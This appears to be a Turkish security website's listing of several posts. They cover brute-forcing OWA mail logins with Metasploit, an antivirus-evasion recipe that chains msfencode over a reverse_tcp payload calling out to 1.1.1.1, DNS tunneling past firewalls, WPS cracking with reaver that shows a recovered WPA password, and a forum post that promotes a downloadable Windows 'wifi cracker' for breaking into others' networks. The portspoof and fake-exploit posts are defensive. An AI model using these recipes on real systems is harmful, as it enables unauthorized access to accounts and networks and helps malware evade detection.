Pentest Çalışmalarında OWA(Outlook Web Access) Hesaplarını Bulma

Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı aşikardır.

Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir meil hesabı  üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri sızdırılabilir.

Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır. 

Internet üzerinden indirilecek çoğu "brute force" yazılımı yeni nesil OWA sürümlerini desteklememekte ya da stabil çalışmamaktadır. Metasploit Aux modüllerine eklenen güncel modül -owa_login- kullanılabilir en sağlam hesap deneme yazılımı olarak gözükmekte. OWA brute force aux modülü kullanılarak OWA 2003, 2007 ve 2010 sürümlerine yönelik brute force çalışmaları gerçekleştirilebilmektedir.

NOT:OWA'ya yönelik gerçekleştirilecek brute force denemelerinde hesap kitleme riski bulunduğundan bu adımı denemeden önce mutlaka pentest yapılan firmanın bilgilendirilmesi gerekmektedir. 



Örnek Uygulama:

root@bt:/pentest/exploits/framework3# ./msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 768 exploits - 406 auxiliary - 119 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14338 updated 15 days ago (2011.12.02)

msf > search owa

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility

msf > use auxiliary/scanner/http/owa_login
msf auxiliary(owa_login) > show options

Module options (auxiliary/scanner/http/owa_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 443 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VERSION 2007 yes OWA VERSION (2003, 2007, or 2010)
VHOST no HTTP server virtual host



show options komutu ile ekrana basılan seçenekler incelenirse bruteforce yapılırken ihtiyaç duyulabilecek bileşenlerin tamamına yakını bulunmaktadır . Detaylı ayar yapılması gerektiğinde show advanced komutu da kullanılabilir.



msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test

USERPASS_FILE => /root/owa_test
msf auxiliary(owa_login) > set RPORT 443
RPORT => 443
msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr
VHOST => mail.HEDEF_SITE.com.tr
msf auxiliary(owa_login) > run
[*] mail.HEDEF_SITE.com.tr:0 OWA - Testing version 2010

[*] mail.HEDEF_SITE.com.tr:0 OWA - Trying ali : ali
-msf auxiliary(owa_login) > run

[*] mail.HEDEF_SITE.com.tr:443 OWA - Testing version 2010
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : HEDEF_SITE
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'HEDEF_SITE'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : ali
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'ali'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : sam
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'sam'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : user
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'user'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : user@domain.com
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'user@domain.com'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : veli
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'veli'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : john
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'john'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : 12345
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : '12345'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : passwoed
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'passwoed'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : aliveli
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'aliveli'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : as
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'as'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : df
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'df'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : er
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'er'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : r
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'r'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE :
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : ''
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yu
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yu'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : u
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'u'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yy
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yy'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tg
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tg'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 3
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '3'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 4
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '4'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 45
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '45'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : bt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'bt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : ertvt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'ertvt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : grt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'grt'
[*] Auxiliary module execution completed

Devamını Görmek İstiyorum →

Siber Saldırılara Karşı Aktif Defans Uygulama

Internet ortamından elde edilen çeşitli araçlarla sistemelere siber saldırı gerçekleştirmek günümüz dünyasında oldukça kolaylaşmıştır.  Güvenlik uzmanları korudukları kurumlara yönelik gerçekleştirilen saldırılara karşı yeni yeni yöntemler deneyerek koruma seviyesini en iyi düzeye taşımaya çalışmaktadır. Son zamanlarda popüler olan koruma yöntemlerinden biri de Aktif Defans'tır. Aktif Defans saldırganların otomotize edilmiş programlar yada scriptler aracılığı ile yaptıkları siber saldırılara karşı, saldırgana ciddi efor ve  zaman kaybı yaratacak bir korunma türüdür.

Bir bilişim sistemine yönelik gerçekleştirilecek saldırılarda genellikle ilk adım port tarama ve ağ keşfi olmaktadır. Aktif defans uygulayarak saldırganın hedef sistemde açık/kapalı olan portları bulması ve bu portlarda çalışan uygulamaları ortaya çıkartması zorlaştırılabilir. Bu yazıda portspoof uygulaması kullanılarak bir sisteme yönelik gerçekleştirilecek port tarama işleminin işe yaramaz hale getirilmesi anlatılmaktadır.

Not: Pratik olarak kurumsal ağlarda kullanılmasını önermiyoruz.

Genel Özellikleri

- root yetkileri gerektirmeksizin çalışır

- iptables kuralları ile kolayca özelleştirilebilir.

- 8.000 üzeri servis için imza desteği bulunuyor.

- Saldırganların kullandıkları araçlar ve yazılımlara karşı 'Aktif saldırılarına karşı korunma' için yardımcı olur.

Kurulumu

# wget https://github.com/drk1wi/portspoof/archive/master.zip
# unzip master.zip
# cd portspoof-master/
# ./configure
# make
# make install

Hizmet verdiğiniz portlar dışındaki tüm trafiği iptables ile portspoof uygulamasına yönlendirmeniz yeterli olucaktır. 

#iptables-restore < system_files/iptables-config

Firewall Kuralları

# iptables -LChain INPUT (policy ACCEPT)
target     prot opt source               destination        
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination        
ACCEPT     all  --  anywhere             anywhere           
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

# iptables -L -t natChain PREROUTING (policy ACCEPT)
target     prot opt source               destination        
REDIRECT   tcp  --  anywhere             anywhere             tcp dpts:tcpmux:ftp redir ports 4444
REDIRECT   tcp  --  anywhere             anywhere             tcp dpts:telnet:65535 redir ports 4444
Chain INPUT (policy ACCEPT)
target     prot opt source               destination        
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination        
Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination 

Genel Kullanımı

Parametrelerin görünümü ve yardım menüsü

# portspoof -h
Usage: portspoof [OPTION]...
Portspoof - service emulator / frontend exploitation framework.
-i   ip : Bind to a particular  IP address
-p   port : Bind to a particular PORT number
-s   file_path : Portspoof service signature regex. file
-c   file_path : Portspoof configuration file
-l   file_path : Log port scanning alerts to a file
-f   file_path : FUZZER_MODE - fuzzing payload file list
-n   file_path : FUZZER_MODE - wrapping signatures file list
-1   FUZZER_MODE - generate fuzzing payloads internally
-2   switch to simple reply mode (doesn't work for Nmap)!
-D   run as daemon process
-d   disable syslog
-v   be verbose
-h   display this help and exit

Portspoof configurasyon dosyası

/usr/local/etc/portspoof.conf

Açık portlar için yanıt vereceği servislere ait imzaların bulunduğu dosya

/usr/local/etc/portspoof_signatures

Portspoof'u servis emulatorü olarak çalıştırmak

# cd /usr/local/etc/
# portspoof -c portspoof.conf -s portspoof_signatures -D
-> Using user defined configuration file portspoof.conf
-> Using user defined signature file portspoof_signatures

Test çalışması

portspoof uygulamasından önce hedef sistemi taradığınızda

# nmap -sV 85.95.238.172 -v
Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-20 04:18 EEST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 04:18
Scanning 85.95.238.172 [1 port]
Completed ARP Ping Scan at 04:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:18
Completed Parallel DNS resolution of 1 host. at 04:18, 0.29s elapsed
Initiating SYN Stealth Scan at 04:18
Scanning 172-238-95-85-datacenter-services.ixirtelekom.com.tr (85.95.238.172) [1000 ports]
Discovered open port 22/tcp on 85.95.238.172
Completed SYN Stealth Scan at 04:18, 0.13s elapsed (1000 total ports)
Initiating Service scan at 04:18
Scanning 1 service on 172-238-95-85-datacenter-services.ixirtelekom.com.tr (85.95.238.172)
Completed Service scan at 04:18, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 85.95.238.172.
Nmap scan report for 172-238-95-85-datacenter-services.ixirtelekom.com.tr (85.95.238.172)
Host is up (0.000097s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
MAC Address: 00:0C:29:40:2B:7A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.032KB)

Portspoof uygulaması çalıştıkdan sonra tarama yaptığınızda tüm portların açık ve tanımlı portlar için aktif servislerin olduğunu görebilirsiniz (nmap ile default taramada 1000 port taranıyor ! )

İlk tarama 1000 port kontrolü için 0.65 saniye sürmüşken, portspoof uygulaması çalıştıkdan sonra saldırganın port taraması yaklaşık olarak 552.74 saniye (9 dakika üzeri) sürmüştür. Buda saldırgan için ciddi zaman ve efor kaybıdır.

Örnek bir sonuç görmek isterseniz, favori port tarama yazılımınız ile portspoof.org adresini tarayabilirsiniz: nmap -sV -v portspoof.org gibi gibi

Devamını Görmek İstiyorum →

Wifi Kırıcı [Wındowsda Wıfı Kırma Programı!] Wifi hack Black-king

erhaba arkadaşlar. Son zamanlarda forumumuzda baya bır wıfı kırıcı ısteğınde bulunuldu.
Kandıl gecesı sızlere hedıyem olsun 
Wındows tabanlı çalışan wıfı kırıcı. Bıldığınız üzere wındows'da wıfı kırıcı yok denıcek kadar az. Hatta az sonra paylaşacağım bu programdan başka lınux bt desteğı almadan çalışan tek proje dıye bılıyorum. Neyse arkadaşlar fazla uzatmadan programa geçelım.

Wıfı kırmak aslında karmaşık bır ıştır ancak bu programla wıfıyı çok rahat bır şekılde kırabılırsınız.
Yaklaşık 5 dakıkada 2 wıfı kırmıştım ben. öğrencı evınde falan çok ışe yaramıştı benım ıçın.
Program ıçın her hangibir internete bağlı olmanıza gerek yok sadece bu verdığım programı kursanız yeterlı.

Sorularınız ve cevapları - Çıkabılecek bütün sorunların çözümleri

Vıdeolu anlatım yaptım sızler ıçın

Vıdeolu Anlatım IZLE

Kurulum Vıdeosu Anlatım
İndir ;

Tıkla İndir v30.9

40.1 Download

40.1 Alternatıf Download

40.3 Download !

40.3 Alternatıf Download

Soru Ve Sorunlarınız IÇIN TIKLAYINIZ

Son güncelleme (Kullanımı aşşağıda mevcuttur.)
Mutlaka INDIR

Son güncelleme Alternatıf Indır


Vırus Total Tarama Sonucu

40.0 Güncelleme denetımı ;

son güncellememizle beraber zyXEL modemlerı %97 verimli sonuç alabilirsiniz.
Güvenlık sıstemı fark etmez zyXEL modemlerı %97 kırabılırsınız.
Iyı kullanımlar.

TP-Link modemlere destek eklenmıştır. TP-Link modemlerı %90 Kırabılırsınız
Iyı kullanımlar.

atheros modemlerıne destek eklenmıştır. atheros modemlerı %99 kırabılırsınız artık. 

40.1 Güncelleme Denetımı : 

Vadafonelere Mobıl destek eklendı.

Wps'ye eklenen BSSID'Ler : 
74:31:70
84:9C:A6
88:03:55
1C:C6:3C
50:7E:5D

BSSID Çekım Kontrolü ;

This image has been resized.Click to view original image

This image has been resized.Click to view original image

Başlangıçlı ıd , port , numara başlangıçlı wıfılerı artık wps'ye düşürebılırsınız.

zyxel modemlere %100 destek
aırteslere %97 destek eklenmıştır.

Algorıtma güçlendırılmıştır.

Evet arkadaşlar yenı bır exe paylaşıyorum. exemızı ındırmek ıçın : jswscapp.exe Yada Tıkla

Bilgisayarım - C - ProgramFılesx86 Içındekı JumpStart klasörünü bulun. Verdığım exe'yı oraya atın. dosyayı onayladıktan sonra wıfıyı tekrar kırmak ıçın ışlemı başlatın.

Yenı tasarım ;

Başlatma :

This image has been resized.Click to view original image

Kırıldıktan sonra :

This image has been resized.Click to view original image

Kıramazsa :

This image has been resized.Click to view original image

Tamamıyla tarafımca ayarlanmıştır. Yeni desteklemeler olmuştur. İyi kullanımlar Dilerim.

turkhackteam.net

Devamını Görmek İstiyorum →

Pentest Çalışmalarında Exploit Denemelerinin Olumsuz Sonuçları

Pentest çalışmalarının en heyecanlı aşamalarından biri exploitation - yani istismar- aşamasıdır. Bu adımda hedef sisteme sızma ya da hedef sistemden işe yarar bilgiler elde etme amaçlanır. Bu aşamada kullanılan exploitin kalitesine ve hedef sistemin durumuna bağlı olarak farklı durumlar gerçekleşebilir. Bu durumlardan iki tanesinin kötü durum senaryosu olarak karşımıza çıkma olasılığı olduğu için üzerinde durmakta fayda görüyoruz.

Tecrübelerimiz, çalışan ortamlarında gerçekleştirilen sızma testlerinde exploitlerin çalıştırılmadan mutlaka lab ortamında denenmesi ve hedef sistemde denenmeden  izin alınması ve bu iznin sözlü değil yazılı olmasına dikkat edilmesi gerektiğini göstermektedir.

Exploit çalıştırıldığında

• Başarılı olup istediğimizi elde etmemizi sağlayabilir,


• Hedef sisteme zarar verip çalışmasını engelleyebilir ya da hedef sistemi dışarıya korunmasız olarak açabilir,


• Kendi sisteminize zarar verebilir.

 

Sahte Exploit Konusu

Pentest süreçlerinde genellikle exploit deneme aşamalarında exploit önce Metasploit gibi araçlarla ve exploit-db, securityfocus gibi sitelerden araştırılır. Buralarda bulunmazsa alternatif olarak Google üzerinen araştırma yapılır. Eğer exploit denemesini yapacak kişi exploitin yazıldığı programlama diline hakim değilse ve kodu hiç incelemeden doğrudan çalıştırıyorsa bu ciddi sıkıntılara yol açabilir.

 

Örnek olarak geçtiğimiz günlerde yayınlanan MS12-020 RDP açıklığını ele alacak olursak. Açıklık ilk yayınlandığında çalışan exploitin olmaması nedeniyle herkes ufak tefek denemeler yaparak internet üzerinden paylaşımlarda bulunuyordu. Bu paylaşımlardan bazıları da doğrudan sahte exploit olarak adlandırabileceğimiz kategoriye giriyordu. Özellikle güvenlikcilerin takip ettiği e-posta listelerine gönderilen mailler Google'un arşivinde değerli bilgi kaynağı olarak görüldüğü için tecrübesiz pentesterlar tarafından doğrudan alınıp kullanuılma tehlikesini barındırmaktadır.

Aşağıdaki örnek FullDisclosure e-posta listesine gönderilen exploit kodunun "basit" analizini içermektedir.

Duruyu maili:



 

Exploit'in shellcode kısmı:



 

Hex kodlanmış payload çözümlenirse aşağıdaki -sağda- gibi bir komut seti ortaya çıkacaktır. Basitçe payload işletim sistemini belirleyip ona göre sistemi silen komutlar icra ediyor. Yani bu exploit çalıştırıldığı sistemi siliyor.



Diğer bir sıkıntı da çalıştırılan exploitin hedef sisteme zarar vermesi şeklinde karşımıza çıkmaktadır. Buna örnek olarak da FreeBSD local root exploitini ele alalım (Hedef sisteme zarar verebilecek exploitlerin local olmasına gerek yok, remote tipte exploitler de zarar verebilir)



 

Aşağıdaki gibi exploit çalıştırıldığında hedef sistemde root haklarıyla komut çalıştırmak yerine doğrudan sistemin crash olmasına neden olabilir.



 

Bu nedenle BGA pentest ekibi olarak pentest yapacağımız çoğu sistemi kendi lab ortamımızda kurarak önce sıkıntılı testleri lab ortamında gerçekleştirip sonrasında müşteri ortamına uyarlamaya özen gösteriyoruz.

Devamını Görmek İstiyorum →

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

Pentest çalışmalarında, hedef sistemi ele geçirdikden sonra yetkisiz işlevleri yerine getirecek bir payload'a ihtiyaç duyulur. Bu bir casus yazılım olabilir (trojan), uzakdan yönetim aracı olabilir (rat) veya hedef sistemde kod/komut çalıştırmanıza olanak sağlayan bir araç   (shellcode exec) olabilir.

BGA pentest ekibi, pentest çalışmalarında ve eğitimlerde multi platform çalışan ve gelişmiş özellikleri olan meterpreter payloadını sıklıkla tercih etmektedir.

Antivirus veya sezgisel antilogger'lar bu tür durumlarda işinizi zorlaştırabilir. Bu yazıda, antiviruslerin çalışma prensiblerine kısaca değinilmiş ve meterpreter ajanının antivirusler tarafından tanınmaz hale getirilmesi teorik olarak anlatılmıştır. Burada anlatılan yöntemler, backtrack 5 r2 üzerinde test edilmiştir ve meterpreter için geçerlidir fakat bu mantık  benzeri yazılımlar içinde uygulanabilir !

Antivusler Nasıl Çalışır ?

• İmza tabanlı (Signature Based)


• ShellCode Analizi


• Sezgisel (heuristic)

İmza tabanlı (Signature Based)

• Her imza bir zararlının karakteristik özelliklerini barındırır.


• Tespit edilmiş viruslere ait imzaları içerir.


• Hızlı sonuç verir.


• Yeni nesil viruslere karşı savunmasızdır.


• Zararlının tespit edilmesi, veritabanına konulması ve son kullanıcıya ulaşması yeni nesil tehtitler karşısında ciddi zaman kaybı yaşatmakdadır.

Sezgisel (heuristic)

• Zararlıyı, sezgisel ve gerçek zamanlı davranış analizi yaparak tespit etmeye çalışır.

Bu çalışma, metasploit framework projesinde bulunan farklı encoderları kullanarak meterpreter içeriğini antivirusler tarafından tanınmaz yapıp, ayrıca masum bir uygulama imajı kazandırmak üzere bir kaç satır kod eklemektedir.

Metasploit Multi Encoder Kullanımı

./msfpayload windows/shell/reverse_tcp  LHOST=1.1.1.1 LPORT=4443 EXITFUNC=thread R |  ./msfencode -e x86/shikata_ga_nai -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t exe -o ajan007.exe

Raw olarak encoderlara gönderilen meterpreter içeriği, encoding işleminden  sonra hex olarak bir dosyaya aktarılır ve ardından bir kaç satır çöp kod (c++ kodu)   eklenerek binary dosya oluşturulur.

Bu uygulamayı yapan v5.sh scriptinden bir ekran görüntüsü

Uygulama eğitim ve test amaçlı geliştirilmiştir, kaynak kodu BGA eğitimine katılanlara ve pentest yapılan firmalara verilmektedir.

Bir kaç genel özelliği;

- Farklı bağlantı türlerine sahip (bind,reverse_http/https/tcp)  meterpreter payloadı oluşturabilmektedir.

- 32 bit 64 bit sistemlerde çalışabilmektedir.

- Linux, Windows ve *BSD ailesinden her türlü işletim sisteminde çalışabilmektedir.

- Unix ve Windows uygulamalarına enfekte olabilmektedir.

- Autorun Script Desteği

Devamını Görmek İstiyorum →

DNS Tünelleme Kullanarak Firewall/IPS Atlatma

Senaryo: Firewall ve Web Proxy (/Content Filter) ile tüm internet trafiği engellenmiş bir kullanıcı/hacker internete  ulaşmak istiyor.

Yerel ağdan internete giden tüm port ve protokoller Firewal tarafından engellenmiştir. Web erişimi için hizmet veren proxy ise yalnızca yetkili kulllanıcılara internet erişimi sağlamaktadır.

Bu sistemlere takılmadan sınırsız ve kayıt altına alınamaz internet trafiği nasıl elde edilebilir ?

DNS Tunnel

Bir protokol içerisinde başka bir protokole ait veri taşıma işlemine protokol tünelleme denir. DNS paketleri içersinden herhangi bir tcp/udp paketini (örneğin, http,ftp, ssh vb.) taşıma işlemi de DNS Tünnelleme olarak isimlendirilir.

DNS sunucu kendisinden sorgulanan bir dns isteğine önce önbelleğini kontrol ederek yanıt vermek ister eğer alan adı dns önbelleğinde yoksa, sorgulanan alan adından sorumlu dns sunucuyu bulur ve ona sorar. Sorgulanan alan adından yetkili dns sunucu ilgili dns kaydı için yanıt verir ve DNS sunucu bu yanıtı istemciye iletir.

Örnek

Kullanıcı, tunnel.bga.com.tr alan adını sorgulamak istediğinde yerel ağındaki dns sunucu bu kayıt önbelleğinde yoksa bu isteğe doğrudan yanıt veremez. tunnel.bga.com.tr  alan adından sorumlu dns sunucuyu bulur dns.bga.com.tr  ve ona tunnel A kaydını sorar aldığı yanıtı istemciye iletir.

Tcp-Over-Dns Çalışma Prensibi

tcp-over-dns client, dns verisini encode ederek ISP'nin dns sunucusuna iletir. ISP'nin dns sunucuyu bu isteğe yanıt veremez ve dns isteğini tcp-over-dns server a iletir. tcp-over-dns server gelen isteği decode eder ve ilgili isteğe yanıtı client a  geri gönderir.  DNS isteklerinin, dns sunucu tarafından önbelleğe alınma ihtimaline karşı her dns sorgusunda rastgele bir subdomain kullanılır.

Ön Gereksinimler:

1. Dns isteklerinize yanıt alabildiğinizi doğrulamalısınız. Örneğin; 'nslookup  google.com.tr' komutu ile google ip adreslerini öğrenebiliyorsanız. DNS isteklerinize yanıt veriliyordur.
2. İnternet dünyasında sizin kontrolünüzde olan bir sunucu.Administrator veya root yetkilerine sahip olmalısınız. UDP 53 portu farklı bir uygulama tarafından kullanılmıyor olmalı ve erişim problemi yaşanmamalıdır.
3. Kullandığınız işletim sistemine göre tcp-over-dns yazılımı. Mutlaka java kurulu olmalıdır.
   http://analogbit.com/software/tcp-over-dns

Tcp-Over-Dns Server Yapılandırması

Bu işlem için bir  alan adına ve bu alan adından sorumlu dns sunucuya ihtiyaç vardır. Bu örnekde aşağıdaki dns kayıtları oluşturup, kullanılmıştır. 

NS = dns.bga.com.tr

A   = tunnel.bga.com.tr

tcpoverdns, multi platform çalışmaktadır (Windows,Linux,*BSD). Bu örnekde dns sunucu FreeBSD istemci ise Windows 7  işletim sisteminde kurulmuştur.

Not: Tcp-Over-Dns server, gelen trafiği port 443 (ssh servisine) yönlendirecektir.

Tcp-Over-Dns Client, yerel bilgisayarda 8080 portunu dinleme açtı ve bu porta yapılan bağlantıları tunnel.bga.com.tr makinasının 443 (ssh) portuna iletecektir.

Test için, putty aracı ile 127.0.0.1:8080 portuna bağlantı isteği başlatıldığında  bga.com.tr adresinin 443 portuna erişim kurulacaktır.

SSH trafiği Firewall tarafından engellenmiş olsada, DNS paketleri ile ssh trafiği internete kaçırıldı.

Bu yöntem ile birçok yerde bulunan Hotspot sistemleri de atlatılabilmek mümkündür.

Devamını Görmek İstiyorum →

WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.

Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.
Kablosuz ağ kartınız monitor modu destekliyor mu, bu nu görmek için şu yazıdan faydalanabilirsiniz.

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)

WPS destekli kablosuz ağları bulmak için,

# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I

Hedefimizde "BGA" kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.

BSSID = 33:22:55:22:11:2F
CH = 9

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv --no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '47128211'
[+] WPA PSK: 'benimgizliparolam876!#'
[+] AP SSID: 'BGA'
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.

Devamını Görmek İstiyorum →